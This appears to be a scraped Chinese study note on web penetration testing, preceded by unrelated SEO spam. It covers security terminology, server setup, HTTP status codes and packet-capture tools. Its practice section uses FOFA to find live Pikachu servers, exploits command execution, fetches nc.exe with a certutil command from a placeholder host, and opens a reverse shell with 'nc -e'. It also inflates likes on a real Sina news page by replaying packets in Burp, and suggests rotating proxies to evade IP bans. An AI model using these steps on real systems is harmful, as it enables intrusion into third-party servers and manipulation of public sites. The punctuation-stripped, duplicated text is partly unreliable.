asp做的网站亚丝娜娜本子全彩,2018年网站开发语言,衡水网站建设哪家好,电商网站类型文章目录 常见名词小实战 网站搭建小实战抓包模拟器状态码返回值网站搭建WEB应用安全漏洞 数据包封包信息收集**参考点** 常见名词
前后端#xff0c;POC/EXP#xff0c;Payload/Shellcode#xff0c;后门/Webshell#xff0c;木马/病毒#xff0c;
反弹… 文章目录 常见名词小实战 网站搭建小实战抓包模拟器状态码返回值网站搭建WEB应用安全漏洞 数据包封包信息收集**参考点** 常见名词
前后端POC/EXPPayload/Shellcode后门/Webshell木马/病毒
反弹回显跳板黑白盒测试暴力破解社会工程学撞库ATTCK等
名词解释
小实战 在fofa暗网浏览器中使用pikachu countryCN titleGet the pikachu命令查询在线pikachu服务器进入测试命令执行漏洞 执行命令查看回显 查看本机是哪种服务器接着使用下载命令将远程连接nc下载到本地并命名为n.exe 文档下载命令转换 选择CMD下载命令复制命令使用命令执行127.0.0.1 certutil.exe -urlcache -split -f http://www.xxx.com:80/nc.exe n.exe出现以下表示下载完成也可以使用dir查看 接着在想要反弹shell的电脑上使用命令 nc -lvvp 端口号(5566)监听端口在肉机上用nc -e /bin/sh(或cmd) 目标ip 5566成功连接上远端服务器。
网站搭建
Web应用架构搭建漏洞概念HTTP Web应用架构 理解不同WEB应用组成角色功能架构: 开发语言程序源码中间件容器数据库类型服务器操作系统第三方软件等 开发语言asp,php,aspx,jsp,java,python,ruby,go,html,javascript等 程序源码根据开发语言分类应用类型分类开源CMS分类开发框架分类等 中间件容器IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等 数据库类型Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等 服务器操作系统Windows系列Linux系列Mac系列等 第三方软件phpmyadmin,vs-ftpd,VNC,ELK,Openssh等 小实战
一个好玩的东西新浪新闻点赞在不登陆的情况下只能点赞一次究其原因应该是浏览器前端问题可以刷新页面继续点赞也可以截取数据包多次发送就能解决仅能发送一次的问题。
已经点赞后无论如何去点都无法再次增加点赞量此时的点赞量为229。 开启burpsuite抓包并右键送至中继器(repeater) 关闭抓包在repeater中继续send数据包刷新网页查看点赞量此时的点赞量已经到了250次了。
抓包模拟器
在PC端显现出来的浏览器与手机端浏览器显现出来的不同使用burpsuite抓包观看数据包的区别。
在burpsuite中配置代理其中127是本地浏览器抓包10是对该计算机局域网内进行抓包(特指模拟器) 模拟器更改配置代理--手动代理服务器主机名改为本机IP地址dialing端口与上述一致为8888如下 分别在PC端与模拟器上抓包让数据流经burp抓包工具如下
通过User-Agent可知其发生差异的原因
状态码返回值
参考文章1 参考文章2 400发送请求有语法错误 403文件夹存在没有权限访问 404访问资源不存在(文件/文件夹) 3xx跳转处置过程判断可有可无 重定向302 5xx内部错误服务器问题判断可有可无 500.服务器内部异常 504.服务器请求超时没有返回结果
在对目标进行扫描时尽量勾选它们为了不放过任何结果需要进行扫描 购买快代理可以随时更换ip防止ip被封禁也可以实现VPN的功效。
网站搭建
安装的前提条件
拥有一台自己的服务器和属于自己的域名(域名要进行备案如果不备案只能在大陆之外进行访问)服务器安装宝塔集成环境方便操作使用选用远程连接工具可以使用Windows自带的远程连接也可以使用FinalShell进行连接在远程服务器上进行操作
选择安装 选用Windows搭建
使用远端mstsc进行搭建域名没有在国内备案在阿里云选用大陆之外的云服务器 选用按量收费双核4G服务器选用Windows版本 确认下单之后配置安全组配置服务器密码这些后期都能进行配置 在服务器上下载宝塔需要注册在域名处提前配置好将域名访问映射到服务器的ip宝塔账号密码是随机的 直接关掉该页面会出现控制面板工具复制面板地址到本机浏览器开始网站的部署。 进入以下界面可以选择傻瓜式安装也可以自己进行配置安装在软件商店中选择。 Win参考连接 Linux参考连接
WEB应用安全漏洞 Web应用安全漏洞分类 SQL注入文件安全RCE执行XSS跨站CSRF/SSRF/CRLF 反序列化逻辑越权未授权访问XXE/XML弱口令安全等 安全漏洞解释
数据包封包信息收集
参考连接 抓包的意义 在我们安全测试中对方可能会提供相对应的ip 地址域名等等那么有的应用是不会给你的当在你测试的时候是不知道对方的目标名字什么的那么我们就可以通过抓取数据包来获得你想要的信息例如对方主机/ip或者与其相关的信息。 抓包的对象 那么抓包他主要是针对协议去抓取的根据不同的协议配对不同的抓包工具就好比我们的网站他可以用BURP抓包工具那么我们的APP或者小程序它就不行了我们的BURP就抓取不到为什么因为我们的APP/小程序他走的不是HTTP协议的所有抓取不到。 抓包的协议 抓包的协议呢就是我们的APP它也可以是HTTP协议的走向因为我们的HTML5就能做出APP那么我们HTML5他的走向协议就是http协议那个APP点开其实就是打开网站了你留心可以发现网站有一些网站和我们点开APP十分像 抓包的支持 其实就是目标他支持哪些抓包工具支持哪些协议 封包的意义 封包他就能自定义我们的一个数据包封包技术说简单也不简单就是将一系列操作封装为数据包方便使用很多我们的外挂都用到封包技术就相当于说你自定义一个数据包封装发送给服务器
参考点
Fiddler 是一个http协议调试代理工具它能够记录并检查所有你的电脑和互联网之间的http通讯设置断点查看所有的“进出”Fiddler的数据指cookie,html,js,css等文件。 Fiddler 要比其他的网络调试器要更加简单因为它不仅仅暴露http通讯还提供了一个用户友好的格式。
手机证书安装需要将防火墙关闭安装证书步骤参考
Charles 是一个HTTP代理服务器,HTTP监视器,反转代理服务器当浏览器连接Charles的代理访问互联网时Charles可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信这些包括request, response和HTTP headers 包含cookies与caching信息。 在模拟器中添加证书help --SSLproxying -- save Charles root certificate保存之后在模拟器中保存到文件夹中接着设置-安全-(加密与凭据)用户凭据-从存储设备安装 / 设置-WALN-更多WALN设置-安装证书接着会让输入密码安装就能抓包。
抓取的包全部出现unknow的解决方法 proxy -- SSL Proxying Settings -- Add 来添加主机和端口 如果个别情况出现unknow可能是本身抓包软件存在个别漏抓问题。可以忽略 从左到右分别为
1清除当前会话 2开始记录 3开启SSL代理 4开始限流/停止限流 5开始断点/停止断点 6根据所写内容撰写新请求 7重发选定请求 8工具 9设置
Charles 激活码在线计算器 ios配置代理 ios下载证书问题 burp逍遥模拟器 app抓包
TCPDump 是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
BurpSuite 是用于攻击web 应用程序的集成平台包含了许多工具。Burp Suite为这些工具设计了许多接口以加快攻击应用程序的过程。所有工具都共享一个请求并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。
Wireshark 是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口直接与网卡进行数据报文交换。
WireShark使用教程
科来网络分析系统 是一款由科来软件全自主研发并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术通过捕获并分析网络中传输的底层数据包对网络故障、网络安全以及网络性能进行全面分析从而快速排查网络中出现或潜在的故障、安全及性能问题。
WPE封包分析 是强大的网络封包编辑器wpe可以截取网络上的信息修改封包数据是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。
封包拦截器 封包监听工具
Charles 茶杯 https://blog.csdn.net/weixin_45459427/article/details/108393878
Fidder https://blog.csdn.net/weixin_45043349/article/details/120088449
BurpSuite https://blog.csdn.net/qq_36658099/article/details/81487491
